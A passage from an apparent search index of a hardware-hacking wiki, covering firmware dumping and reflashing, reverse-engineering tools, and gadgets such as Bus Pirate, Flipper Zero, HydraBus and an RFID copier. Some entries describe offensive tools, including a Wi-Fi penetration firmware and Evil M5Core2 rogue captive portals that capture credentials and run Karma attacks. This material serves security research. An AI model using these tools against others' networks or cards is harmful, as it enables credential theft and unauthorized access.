<pre><code>mksquashfs4 squashfs-root myrootfs {options}\ndd if=myrootfs of=dump.bin bs=1 seek=&lt;offset&gt; conv=notrunc\n</code></pre></p> </li> <li> <p>Flashrom write <pre><code>flashrom -p ft2232_spi:type=232H -w dump.bin\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#type-of-firmware","title":"Type of firmware","text":"<ul> <li><code>SREC</code> - Motorola S-Record : All S-record file lines start with a capital S.</li> <li><code>Intel HEX</code> lines all start with a colon.</li> <li><code>TI-TXT</code> is a Texas Instruments format, usually for the MSP430 series. Memory addresses are prepended with an @, and data is represented in hex.</li> <li><code>Raw</code> NAND dumps</li> </ul>"},{"location":"firmware/firmware-dumping/#check-entropy","title":"Check entropy","text":"<p>High entropy = probably encrypted (or compressed). Low entropy = probably not.</p> <pre><code>$ binwalk -E fw\n</code></pre>"},{"location":"firmware/firmware-dumping/#encrypted-firmware","title":"Encrypted firmware","text":"<ul> <li>MINDSHARE: DEALING WITH ENCRYPTED ROUTER FIRMWARE</li> </ul>"},{"location":"firmware/firmware-dumping/#over-the-air-updates","title":"Over-the-air updates","text":"<p>TODO</p>"},{"location":"firmware/firmware-dumping/#references","title":"References","text":"<ul> <li>Extracting Firmware from Embedded Devices (SPI NOR Flash) - Flashback Team - 9 sept. 
2022</li> <li>Real Hardware Hacking for S$30 or Less - Joe FitzPatrick - 31 March 2020</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/","title":"Firmware Reverse Engineering","text":""},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ida","title":"Loading bare-metal binaries into IDA","text":"<p>Requirements:</p> <ul> <li>The load address is the address in memory that the binary is being executed from.</li> <li>The entry point is the location within the binary where the processor starts executing.</li> </ul> <p>\u26a0\ufe0f For ARM Arduino firmware the entry point is located at the _RESET interrupt vector.</p> <p>To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323_L.</p> <ul> <li>ESP8266 : https://github.com/themadinventor/ida-xtensa</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-radare2","title":"Loading bare-metal binaries into Radare2","text":"<p>Radare2 can disassemble <code>avr</code> and <code>arduino</code> natively.</p> <pre><code>$ radare2 -A -a arm -b 32 ihex://Challenge_v3.hex\n[x] Analyze all flags starting with sym. 
and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] find and analyze function preludes (aap)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x10001018 (aav)\n[x] 0x00000000-0x10001018 in 0x0-0x10001018 (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information\n[x] Use -AA or aaaa to perform additional experimental analysis.\n\n[0x565e8640]&gt; aaaa\n[0xf7723a20]&gt; afl\n[0xf7723a20]&gt; e asm.describe = true\n[0xf7723a20]&gt; s main\n[0x0804873b]&gt; pdf\n\nTo perform a case-insensitive search for strings use /i:\n[0x0001d62c]&gt; /i Exploding\nSearching 9 bytes in [0x0-0x10001018]\nhits: 1\n0x0003819e hit1_0 .. N# NExploding Firmware ! N.\n\n$ r2 -a avr /tmp/flash\n[0x000000c4]&gt; afr\n[0x000000c4]&gt; pd 17\n\n$ rasm2 -a avr -d \"0c94 751b 0c94 9d1b 0c94 d72c\" \njmp 0x36ea\njmp 0x373a\njmp 0x59ae\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#loading-bare-metal-binaries-into-ghidra","title":"Loading bare-metal binaries into Ghidra","text":"<p>SVD-Loader for Ghidra automates the entire generation of peripheral structs and memory maps for over 650 different microcontrollers</p> <ul> <li>SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering - svd-loader/</li> </ul> <p>Usage</p> <ul> <li>Load a binary file</li> <li>Open it in the code-browser, do not analyze it</li> <li>Run the SVD-Loader Script</li> <li>Select an SVD file</li> <li>Analyze the file</li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#esptool","title":"ESPTool","text":"<p>ESP8266 and ESP32 serial bootloader utility : espressif/esptool</p> <pre><code>josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file\nesptool.py v2.4.0-dev\nImage version: 1\nEntry 
point: 4010f29c\n1 segments\nSegment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#nrf5x-firmware-disassembly-tools","title":"nRF5x Firmware disassembly tools","text":"<ul> <li>DigitalSecurity/nrf5x-tools</li> </ul> <pre><code>$ python3 nrfident.py bin firmwares/s132.bin\nBinary file provided firmwares/s132.bin\nComputing signature from binary\nSignature: d082a85351ee18ecfdc9dcb01352f5df3d938a2270bcadec2ec083e9ceeb3b1e\n=========================\nSDK version: 14.0.0\nSoftDevice version: s132\nNRF: nrf52832\n=========================\nSDK version: 14.1.0\nSoftDevice version: s132\nNRF: nrf52832\nSoftDevice : s132\nCard version : xxaa\n *****\nRAM address : 0x20001368\nRAM length : 0xec98\nROM address : 0x23000\nROM length : 0x5d000\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#pure-disassemblers","title":"Pure disassemblers","text":"<ul> <li>Vavrdisasm -- vAVRdisasm will auto-recognize Atmel Generic, Intel HEX8, and Motorola S-Record files - vsergeev/vavrdisasm</li> <li>ODA - The Online Disassembler</li> <li> <p>avr-objdump \u2013 gcc kit standard tool</p> <pre><code>$ avr-objdump -l -t -D -S main.bin &gt; main.bin.dis\n$ avr-objdump -m avr -D main.hex &gt; main.hex.dis\n</code></pre> </li> </ul>"},{"location":"firmware/firmware-reverse-engineering/#simulating-avr","title":"Simulating AVR","text":"<p>Programs compiled for Arduino can be simulated using AVR Studio or the newer Atmel Studio. I have used the former along with hapsim. 
Hapsim works by hooking into AVR Studio and can simulate peripherals like the UART, LCD etc.</p> <pre><code>$ simulavr -P atmega128 -F 16000000 -f build-crumbuino128/ex1.1.elf\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#uefi-firmware","title":"UEFI Firmware","text":"<p>Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc - theopolis/uefi-firmware-parser</p> <pre><code>sudo pip install uefi_firmware\n$ uefi-firmware-parser --test ~/firmware/*\n~/firmware/970E32_1.40: UEFIFirmwareVolume\n~/firmware/CO5975P.BIO: EFICapsule\n~/firmware/me-03.obj: IntelME\n~/firmware/O990-A03.exe: None\n~/firmware/O990-A03.exe.hdr: DellPFS\n</code></pre>"},{"location":"firmware/firmware-reverse-engineering/#references","title":"References","text":"<ul> <li>GreHack22 - SecureDUO - chrisrdlg</li> <li>Loader un binaire Arduino dans IDA - Posted on January 26, 2014 by thanatos</li> <li>REcon 2014 - Reverse Engineering Flash Memory For Fun and Benefit - Matt Oh</li> <li>Reverse Engineering Flash Memory for Fun and Benefit - Jeong Wook (Matt) Oh</li> </ul>"},{"location":"gadgets/arduino/","title":"Arduino","text":""},{"location":"gadgets/arduino/#_1","title":"Arduino","text":"<ul> <li>Logic Analyzer for Arduino, AVR, ESP8266 and STM32 - aster94/logic-analyzer</li> <li>JTAGulator-like for Arduino, Teensy, STM32 Bluepill, Texas Instruments Tiva and RaspberryPi - cyphunk/JTAGenum</li> </ul>"},{"location":"gadgets/arduino/#references","title":"References","text":""},{"location":"gadgets/bruschetta-board/","title":"Bruschetta","text":""},{"location":"gadgets/bruschetta-board/#documentation","title":"Documentation","text":"<ul> <li>whid-injector/BRUSCHETTA-Board - The Multi-Protocol Swiss-Army-Knife for Hardware Hackers (UART/JTAG/SPI/I2C)</li> <li>whid-injector/PIZZAbite - A cheaper and open-hardware version of the blasoned Sensepeek's PCBite for Hardware Hacking and DIY Hobbyists</li> </ul> <p>Bruschetta is the latest board to 
interact with hardware and is an upgraded version of these earlier projects:</p> <ul> <li>whid-injector/Focaccia-Board - Multipurpose Breakout for the FT232H</li> <li>whid-injector/Burtleina-Board - Yet another Multipurpose Breakout Board to hack hardware in a clean and easy way</li> <li>whid-injector/NANDo-board - 2nd Generation of Multipurpose FTDI-based board for Hardware Hacking and IoT Security Testing</li> </ul>"},{"location":"gadgets/bruschetta-board/#usage","title":"Usage","text":"<ul> <li>Mode 2 (UART1+I2C+SPI-VCP): S1=ON and S2=OFF</li> <li>Mode 4 (UART1+JTAG): S1=ON and S2=ON</li> </ul>"},{"location":"gadgets/bruschetta-board/#references","title":"References","text":"<ul> <li>\ud83c\udf55PIZZAbite &amp; BRUSCHETTA-board: The Hardware Hacking Toolkit you need for your own Lab! \ud83c\uddee\ud83c\uddf9 - WHID - We Hack In Disguise - 28 sept. 2023</li> <li>PIZZAbite &amp; BRUSCHETTA-board: The Hardware Hackers tools you need to kickstart your own Lab! - WHID - We Hack In Disguise - SEP 28, 2023</li> <li>Hacking IoT &amp; RF Devices with B\u00fcrtleinaBoard\u2122 - Luca Bongiorni - Jul 27, 2020</li> </ul>"},{"location":"gadgets/bus-pirate/","title":"Bus Pirate","text":""},{"location":"gadgets/bus-pirate/#firmwares","title":"Firmwares","text":"<ul> <li>BusPirate/Bus_Pirate <pre><code>cd Bus_Pirate/package/BPv4-firmware/pirate-loader-v4-source/pirate-loader_lnx\nsudo ./pirate-loader_lnx --dev=/dev/ttyACM0 --hex=../BPv4-firmware-v6.3-r2151.hex\n</code></pre></li> </ul>"},{"location":"gadgets/bus-pirate/#examples","title":"Examples","text":"<p>Dump firmware over SPI using a Bus Pirate</p> <pre><code># Identify the SPI flash chip\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0\n\n# Dump firmware using a Bus Pirate (SPI); the programmer name is lower-case\nsudo flashrom -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -c (Chip name) -r (Name.bin)\n</code></pre>"},{"location":"gadgets/bus-pirate/#references","title":"References","text":"<ul> <li>Bus Pirate Unboxing - Toolkit - Hacker Warehouse - 4 June 2018</li> 
<li>Bus Pirate 5 REV 10 Hardware</li> <li>Ph0wn, my first IoT CTF - Part 2 - Sebastien Andrivet - 19 December 2018</li> <li>Hardware Hacking: Plunder With a Bus Pirate - Brian Berg - February 15, 2024</li> </ul>"},{"location":"gadgets/ch341a/","title":"CH341A","text":""},{"location":"gadgets/ch341a/#dump-spi-flash","title":"Dump SPI flash","text":""},{"location":"gadgets/ch341a/#ch341eeprom","title":"ch341eeprom","text":"<p>https://github.com/plumbum/ch341eeprom</p> <pre><code>sudo apt install git make libusb-1.0-0-dev clang\ngit clone https://github.com/plumbum/ch341eeprom.git\nmake\n./ch341eeprom -v -s 24c05 -r dump.bin\n</code></pre>"},{"location":"gadgets/ch341a/#flashrom","title":"Flashrom","text":"<pre><code>sudo flashrom -V --programmer ch341a_spi -r dump.bin\nsudo flashrom -V --programmer ch341a_spi -r dump.bin -c W25Q16.V # Specify the chip\n</code></pre>"},{"location":"gadgets/esp32/","title":"ESP32","text":"<ul> <li>ESP32 datasheet: esp32_datasheet_en.pdf</li> <li>Xtensa\u00aeInstruction Set Architecture (ISA)</li> </ul> <p>ESP32 and ESP8266 share almost the same architecture.</p>"},{"location":"gadgets/esp32/#tools","title":"Tools","text":"<ul> <li>espressif/esptool - Espressif SoC serial bootloader utility</li> <li>jmswrnr/esp32knife - Tools for ESP32 firmware dissection</li> <li>scientifichackers/ampy - Utility to interact with a MicroPython board over a serial connection</li> <li>ESPWebTool - Flash your ESP32 or ESP8266 through your browser.</li> <li>tenable/esp32_image_parser - A toolkit for helping you reverse engineer ESP32 firmware.</li> </ul>"},{"location":"gadgets/esp32/#firmwares","title":"Firmwares","text":"<ul> <li>risinek/esp32-wifi-penetration-tool - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks. 
</li> <li>justcallmekoko/ESP32Marauder - A suite of WiFi/Bluetooth offensive and defensive tools for the ESP32 </li> </ul>"},{"location":"gadgets/esp32/#flashing","title":"Flashing","text":"<p>The ESP32 microprocessor uses the Xtensa instruction set, use <code>Tensilica Xtensa 32-bit little-endian</code> in Ghidra.</p> <ul> <li> <p>Flash a new firmware with <code>espressif/esptool</code> <pre><code>esptool.py -p /dev/ttyUSB0 -b 460800 --before default_reset --after hard_reset --chip esp32 write_flash --flash_mode dio --flash_size 2MB --flash_freq 40m 0x1000 build/bootloader/bootloader.bin 0x8000 build/partition_table/partition-table.bin 0x10000 build/ble_ctf.bin\nesptool.py -p /dev/ttyS5 -b 115200 --after hard_reset write_flash --flash_mode dio --flash_freq 40m --flash_size detect 0x8000 build/partition_table/partition-table.bin 0x1000 build/bootloader/bootloader.bin 0x10000 build/esp32-wifi-penetration-tool.bin\n</code></pre></p> </li> <li> <p>Flash a new firmware with <code>scientifichackers/ampy</code> (MicroPython) <pre><code>ampy --port /dev/ttyUSB0 put bla.py\n</code></pre></p> </li> <li> <p>Dump the flash <pre><code>esptool -p COM7 -b 115200 read_flash 0 0x400000 flash.bin\n</code></pre></p> </li> <li> <p>Dissect the flash <pre><code>python esp32knife.py --chip=esp32 load_from_file ./flash.bin\n</code></pre></p> </li> <li> <p>Flash the new firmware <pre><code># repair the checksum\npython esp32fix.py --chip=esp32 app_image ./patched.part.3.factory \nesptool -p COM7 -b 115200 write_flash 0x10000 ./patched.part.3.factory.fixed\n</code></pre></p> </li> </ul>"},{"location":"gadgets/esp32/#references","title":"References","text":"<ul> <li>ESP32-reversing - BlackVS</li> <li>ESP32 Wi-Fi Penetration Tool - GitHub - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks</li> <li>ESP32 Wi-Fi Penetration Tool - Documentation - Exploring possibilities of ESP32 platform to attack on nearby Wi-Fi networks</li> <li>Hacking a Smart Home Device - 
@jmswrnr - 03 Feb 2024</li> <li>Reversing ESP8266 Firmware (Part 1) - Bored Pentester - 26th October 2018</li> <li>Reversing ESP8266 Firmware (Part 2) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 3) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 4) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 5) - Bored Pentester - 25th October 2018</li> <li>Reversing ESP8266 Firmware (Part 6) - Bored Pentester - 25th October 2018</li> </ul>"},{"location":"gadgets/flipper-zero/","title":"Flipper Zero","text":""},{"location":"gadgets/flipper-zero/#firmwares","title":"Firmwares","text":"<ul> <li>Flipper Zero Firmware</li> <li>Flipper Zero Unleashed Firmware</li> <li>Flipper Zero FW RogueMaster</li> <li>Flipper Zero Xtreme-Firmware</li> <li>Flipper Zero Momentum-Firmware</li> </ul>"},{"location":"gadgets/flipper-zero/#firmware-update-pc","title":"Firmware Update - PC","text":"<ol> <li>Update to the latest firmware using https://flipperzero.one/update</li> <li>Download and install qFlipper</li> <li>Connect your Flipper Zero via USB, update to the official firmware</li> <li>Disconnect from USB, power off the Flipper Zero, and remove the SD to prepare it for flashing.</li> <li>Download the latest RogueMaster firmware from their Github Page. </li> <li>Unzip the downloaded .zip and copy the content into /update of the Flipper SD card (including the .dfu)</li> <li>On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it.</li> <li>You should now see the contents you uploaded and an 'update' option. 
Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option.</li> </ol>"},{"location":"gadgets/flipper-zero/#firmware-update-webupdater","title":"Firmware Update - WebUpdater","text":"<ul> <li>DarkFlippers/unleashed-firmware - Web Update</li> <li>RogueMaster/flipperzero-firmware-wPlugins - Web Update</li> </ul>"},{"location":"gadgets/flipper-zero/#gpio","title":"GPIO","text":""},{"location":"gadgets/flipper-zero/#videos","title":"Videos","text":"<ul> <li>Flipper Zero: Want some good news? - Penthertz</li> <li>Flipper Zero: is this for you? Follow our 1st tests! - Penthertz</li> <li>Flipper Zero: french collection video on the Flipper Zero, tutorial and explain</li> </ul>"},{"location":"gadgets/flipper-zero/#tutorials-and-resources","title":"Tutorials and Resources","text":"<ul> <li>Flipper Zero Hacking 101 - pingywon</li> <li>Flipper Zero Playground - UberGuidoZ</li> <li>Flashing Flipper Zero with RogueMaster CFW</li> <li>Unleashed Firmware - Update firmware</li> </ul>"},{"location":"gadgets/flipper-zero/#ioc","title":"IOC","text":"<p>MAC addresses from IEEE for Flipper Zero: <code>0C:FA:22:XX:XX:XX</code>. 
This applies to Bluetooth, Ethernet, WiFi interfaces.</p> <pre><code>0C-FA-22 (hex) FLIPPER DEVICES INC\n0CFA22 (base 16) FLIPPER DEVICES INC\n 2803 Philadelphia Pike Suite B #551\n Claymont 19703\n US\n</code></pre>"},{"location":"gadgets/flipper-zero/#references","title":"References","text":"<ul> <li>The Ultimate Guide / CheatSheet to Flipper Zero - Ilias Mavropoulos - 17/01/2024</li> <li>djsime1/Awesome FlipperZero - \ud83d\udc2c A collection of awesome resources for the Flipper Zero device</li> <li>Reading NFC cards - Flipper Docs</li> </ul>"},{"location":"gadgets/goodfet/","title":"GoodFET","text":"<ul> <li>travisgoodspeed/goodfet - An embedded bus adapter for various microcontrollers and radios.</li> <li>greatscottgadgets/Facedancer - modern FaceDancer core for multiple devices-- including GreatFET</li> </ul>"},{"location":"gadgets/goodfet/#facedancer","title":"Facedancer","text":"<p>The Facedancer21 is the twenty-fourth hardware revision of the GoodFET, owing its heritage to the GoodFET41 and Facedancer20. Unlike the general-purpose GoodFET boards, the only purpose of this board is to allow USB devices to be written in host-side Python, so that one workstation can fuzz-test the USB device drivers of another host. </p>"},{"location":"gadgets/goodfet/#references","title":"References","text":"<ul> <li>GoodFET</li> <li>Facedancer21 - GoodFET</li> <li>Black Hat USA 2016 GreatFET Making GoodFET Great Again - 5 oct. 
2019</li> </ul>"},{"location":"gadgets/hydrabus/","title":"HydraBus","text":""},{"location":"gadgets/hydrabus/#features","title":"Features","text":"<p>Support many extensions:</p> <ul> <li>HydraNFC - Hydrabus shield for NFC</li> <li>HydraFlash - NAND flash shield</li> <li>HydraLINCAN - Hydrabus shield for LIN and CAN buses</li> </ul> <p>External interactions:</p> <ul> <li>Bus interaction commands</li> <li>Trigger mode</li> <li>ADC guide</li> <li>DAC guide</li> <li>PWM guide</li> <li>GPIO guide</li> <li>SPI guide / binary mode</li> <li>I2C guide / binary mode</li> <li>1-wire guide / binary mode</li> <li>2-wire guide</li> <li>3-wire guide</li> <li>UART guide / binary mode</li> <li>CAN guide / binary mode</li> <li>JTAG guide</li> <li>NAND Flash guide / binary mode</li> <li>Wiegand guide</li> <li>LIN guide</li> <li>SMARTCARD guide / binary mode</li> <li>NFC guide / binary mode</li> </ul>"},{"location":"gadgets/hydrabus/#firmware","title":"Firmware","text":"<ul> <li>hydrabus/hydrafw - HydraFW official firmware for HydraBus/HydraNFC</li> <li>hydrabus/hydrafw_hydranfc_shield_v2 - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2</li> <li>bvernoux/blackmagic - In application debugger for ARM Cortex microcontrollers</li> </ul>"},{"location":"gadgets/hydrabus/#firmware-update","title":"Firmware Update","text":"<p>Detailed steps: hydrafw/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux</p> <ol> <li> <p>Install <code>dfu-util</code> <pre><code>git clone git://git.code.sf.net/p/dfu-util/dfu-util dfu-util\ncd dfu-util\n./autogen.sh\n./configure\nsudo make install\n</code></pre></p> </li> <li> <p>Download the latest release of the firmware <pre><code>wget https://github.com/hydrabus/hydrafw/releases/download/v0.11/build_HydraFW_v0.11-12-ga6019f4_HydraBus_HydraNFC.zip\nwget https://raw.githubusercontent.com/hydrabus/hydrafw/master/utils/udev-rules/09-hydrabus.rules -O ~/hydrafw/09-hydrabus.rules\n</code></pre></p> </li> <li> <p>Keep pressing <code>UBTN</code> 
button at <code>PowerON/RESET</code> in order to enter <code>USB DFU</code></p> </li> <li>Connect the MicroUSB cable from your PC to HydraBus</li> <li>Check Linux detection for HydraBus in DFU mode: <code>sudo dfu-util -l</code></li> <li>Flash the firmware: <code>sudo dfu-util -i 0 -a 0 -d 0483:df11 -D ./build/hydrafw.dfu</code></li> </ol>"},{"location":"gadgets/hydrabus/#commands","title":"Commands","text":"<ul> <li> <p>Basic info: <code>show system</code></p> <p><code>ps1&gt; show system HydraFW (HydraBus) v0.11-1-g4d74500 2023-05-09 sysTime: 0x000d82dd. cyclecounter: 0x76ac02b9 cycles. cyclecounter64: 0x0000000076ac02cb cycles. 10ms delay: 1680035 cycles.</code></p> </li> <li> <p>Determine the port name: <code>ls -l /dev/tty*</code></p> </li> <li>Interact with the HydraBus: <code>screen /dev/ttyACM0</code></li> <li>Switch to SPI mode: <code>spi</code></li> <li>Determine the pins for SPI: <code>show pins</code></li> </ul>"},{"location":"gadgets/hydrabus/#syntax","title":"Syntax","text":"Value Description [ Chip select (CS) active (low) ] CS disable (high) r Read one byte by sending dummy byte (0xff). r:1...255 for bulk reads hd Read one byte by sending dummy byte (0xff). hd:1...4294967295 for bulk reads. Displays a hexdump of the result w Followed by values to write byte(s). w:1...255 for bulk writes 0b Write this binary value. Format is 0b00000000 for a byte, but partial bytes are also fine: 0b1001 0 Write this Octal value. Format is prefixed by a 0 (values from 000 to 077) \" Write an ASCII-encoded string 0h/0x Write this HEX value. Format is 0h01 or 0x01. Partial bytes are fine: 0xA. A-F can be lower-case or capital letters 0-255 Write this decimal value. 
Any number not preceded by 0x, 0h, or 0b is interpreted as a decimal value <p>Examples:</p> <ul> <li>Read Identification (0x9F): <code>[ 0x9F r:3 ]</code></li> <li>Read Data (0x03) at the address (0x00:3) and read 32 bytes (hd:32) <code>[ 0x03 0x00:3 hd:32 ]</code></li> </ul>"},{"location":"gadgets/hydrabus/#references","title":"References","text":"<ul> <li>HydraBus/HydraFW wiki - Benjamin Vernoux - Jan 21, 2021</li> <li>HydraBus v1.0 Specifications - HydraBus</li> <li>HydraBus Assembly Video - Lab401 - 30 may 2017</li> <li>BlackAlps17: Hydrabus: Lowering the entry fee to the IoT bugfest - Benjamin Vernoux - 2 dec. 2017</li> <li>HydraBus - An Open Source Platform - RMLL Sec 2017</li> <li>Ph0wn, my first IoT CTF - Part 3 - Sebastien Andrivet - Dec. 19, 2018</li> <li>Getting Started with HydraBus flash and use hydrafw on linux - Benjamin Vernoux - 05/02/2024</li> </ul>"},{"location":"gadgets/hydraflash/","title":"HydraFlash","text":"<p>Designed to dump Flash NAND chips</p>"},{"location":"gadgets/hydraflash/#usage","title":"Usage","text":"<ul> <li>hydrabus/DumpFlash-Hydrabus <pre><code>pip install git+https://github.com/hydrabus/DumpFlash-Hydrabus\npython2 DumpFlash.py -d /dev/hydrabus -i\n</code></pre></li> </ul>"},{"location":"gadgets/hydraflash/#references","title":"References","text":"<ul> <li>Hydrabus NAND Flash shield - hydrabus/HydraFlash</li> </ul>"},{"location":"gadgets/hydranfc/","title":"HydraNFC","text":""},{"location":"gadgets/hydranfc/#features","title":"Features","text":"<ul> <li>Support of microSD (FAT16/FAT32) card up to 32GB</li> <li>Virtual Serial Port access through micro USB with VT100 terminal/shell</li> <li>Basic UID read for Vicinity/ISO15693</li> <li>Basic UID read for ISO14443-A/MIFARE \u00ae card 4 or 7bytes UID</li> <li>Read MIFARE Ultralight\u00ae tag content (full dump)</li> <li>Tag Emulation UID ISO14443A &amp; MIFARE Classic\u00ae 1K</li> <li>Sniffer mode in an autonomous/stand-alone mode</li> <li>Real-time ISO14443A sniffer mode</li> 
</ul>"},{"location":"gadgets/hydranfc/#firmware","title":"Firmware","text":"<ul> <li>hydrabus/hydrafw_hydranfc_shield_v2 - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2</li> </ul> <p>Using console, type <code>nfc</code> + <code>Enter</code> to enter NFC mode dedicated to HydraNFC Shield v2.</p> <pre><code>&gt; nfc\nNFCv2&gt; nfc-all\nNFCv2&gt; show\nNFCv2&gt; nfc-all scan\n</code></pre>"},{"location":"gadgets/hydranfc/#references","title":"References","text":"<ul> <li>HydraFW HydraNFC v2 guide - Benjamin Vernoux - Jul 4, 2021</li> <li>HydraNFC Getting Started - Lab401 - 30 mai 2017</li> <li>HydraBus / HydraNFC unboxing &amp; Assembly - Lab401 - 30 mai 2017</li> <li>HydraNFC - LAB401 product presentation - 17 mai 2018</li> </ul>"},{"location":"gadgets/hydrausb3/","title":"HydraUSB3","text":"<p>HydraUSB3 (WCH CH569) open source test firmware / examples / libraries to experiment with streaming / high-speed protocols (USB2 HS, USB3 SS, HSPI, SerDes...)</p> <p></p> <ul> <li>hydrausb3/hydrausb3_fw - Firmware</li> <li>hydrausb3/hydrausb3_hw - Hardware documentation</li> </ul> <p>Warning It is MANDATORY to buy a \u201cUSB 3 Type A male to USB 3 Type A male cable\u201d (the cable shall have Power+Data with USB2 and USB3 SS signals)</p>"},{"location":"gadgets/hydrausb3/#firmware-flashing","title":"Firmware Flashing","text":"<p>Linux</p> <ul> <li>How to build flash and use examples on Linux with shell</li> <li>How to build flash and use examples on Linux with Eclipse IDE</li> </ul> <p>Windows (requires MSYS2/MINGW64)</p> <ul> <li>How to build flash and use examples on Windows with MSYS2/MINGW64 shell</li> <li>How to build flash and use examples on Windows with Eclipse IDE</li> </ul>"},{"location":"gadgets/hydrausb3/#references","title":"References","text":"<ul> <li>HydraUSB3 v1.0 Specifications - HydraBus</li> <li>GreHack2022 - Reverse Engineering of advanced RISC-V MCU with USB3 &amp; High Speed peripherals - Benjamin Vernoux</li> <li>GreHack22 - SecureDUO</li> 
<li>WCH CH569 SerDes Reverse Engineering - hydrausb3</li> </ul>"},{"location":"gadgets/icopy-x/","title":"iCopy-X","text":"<p>iCopy-X is a \"super\" automated handheld RFID copier based on Proxmark3. iCopy-X can read, crack, duplicate, sniff and simulate without the use of a PC.</p> <ul> <li>iCopy-X-Community<ul> <li>iCopy-X-Community/icopyx-upstream - Collecting elements provided by the manufacturer</li> <li>iCopy-X-Community/icopyx-community-pm3 - Scrap repo for various tests</li> <li>iCopy-X-Community/icopyx-teardown</li> </ul> </li> </ul>"},{"location":"gadgets/icopy-x/#update","title":"Update","text":"<p>Latest firmware: <code>1.0.90 2022-08-16</code></p> <ul> <li>icopy-x.com/otasys</li> </ul> <p>Step 1: Enter the device S/N (found under the \u201cAbout\u201d menu) on the website and download the upgrade package to your PC.</p> <p>Step 2: Connect the iCopy-X to your computer using the supplied USB TYPE C cable and delete any files that end in \u201c.ipk\u201d from the root directory.</p> <p>Step 3: Copy the newly downloaded upgrade package to the root directory.</p> <p>Step 4: Press \"Ok\" on the second page of the \"About\" menu on the iCopy-X to start the automatic upgrade.</p> <p>TIP: Ensure that the serial number has been entered correctly before starting as this could cause the upgrade to fail.</p>"},{"location":"gadgets/icopy-x/#pc-mode","title":"PC Mode","text":"<p>In PC-Mode, after connecting to the computer, open the client in the built-in U disk, you can directly use the Proxmark3 universal CMD to operate.</p> <pre><code>COM Port (Check Device Manager, numbers only): 4\n[=] Session log E:/CLIENT_X86/.proxmark3/logs/log_20240730.txt\n[+] loaded from JSON file E:/CLIENT_X86/.proxmark3/preferences.json\n[=] Using UART port /com4\n[=] Communicating with PM3 over USB-CDC\n[usb] pm3 --&gt;\n</code></pre>"},{"location":"gadgets/icopy-x/#references","title":"References","text":"<ul> <li>iCopy-X - Kickstarter - iCopy-X: Handheld Smart RFID Multi-Tool - Nikola 
T. Lab</li> <li>icopy-x Official Website</li> </ul>"},{"location":"gadgets/logic-analyzer/","title":"Logic Analyzer","text":""},{"location":"gadgets/logic-analyzer/#sigrok-pulseview","title":"Sigrok / Pulseview","text":"<ul> <li>Sigrok wiki &gt; Downloads <pre><code>sigrok/kali-rolling 0.3 all\nLogic analyzer and protocol decoder software suite (metapackage)\n\npulseview/kali-rolling 0.4.2-3+b1 amd64\nsigrok logic analyzer, oscilloscope, and MSO GUI\n</code></pre></li> </ul>"},{"location":"gadgets/logic-analyzer/#saleae","title":"Saleae","text":"<ul> <li>Logic 2 Software</li> </ul>"},{"location":"gadgets/logic-analyzer/#interact","title":"Interact","text":"<pre><code>screen /dev/ttyUSB0 19200\n</code></pre>"},{"location":"gadgets/logic-analyzer/#references","title":"References","text":"<ul> <li>LOGIC ANALYZERS: TAPPING INTO RASPBERRY PI SECRETS - Arya Voronova - August 31, 2023</li> <li>LOGIC ANALYZERS: CAPABILITIES AND LIMITATIONS - Arya Voronova - September 12, 2023</li> </ul>"},{"location":"gadgets/m5stack/","title":"Evil M5Core2","text":"<p>Evil-M5Core2 is an easy evil portal and rogue app deployment software designed to work on the M5Stack Core2.</p> <p></p>"},{"location":"gadgets/m5stack/#features","title":"Features","text":"<ul> <li>WiFi Network Scanning: Identify and display nearby WiFi networks.</li> <li>Network Cloning: Check information and replicate networks for in-depth analysis.</li> <li>Captive Portal Management: Create and operate a captive portal to prompt users with a page upon connection.</li> <li>Credential Handling: Capture and manage portal credentials.</li> <li>Remote Web Server: Monitor the device remotely via a simple web interface that can provide credentials and upload portals that are stored as files on the SD card.</li> <li>Sniffing probes: Sniff nearby probe requests and store them on the SD card.</li> <li>Karma Attack: Try a simple Karma Attack on a captured probe.</li> <li>Automated Karma Attack: Try a Karma Attack on nearby probes automatically</li> 
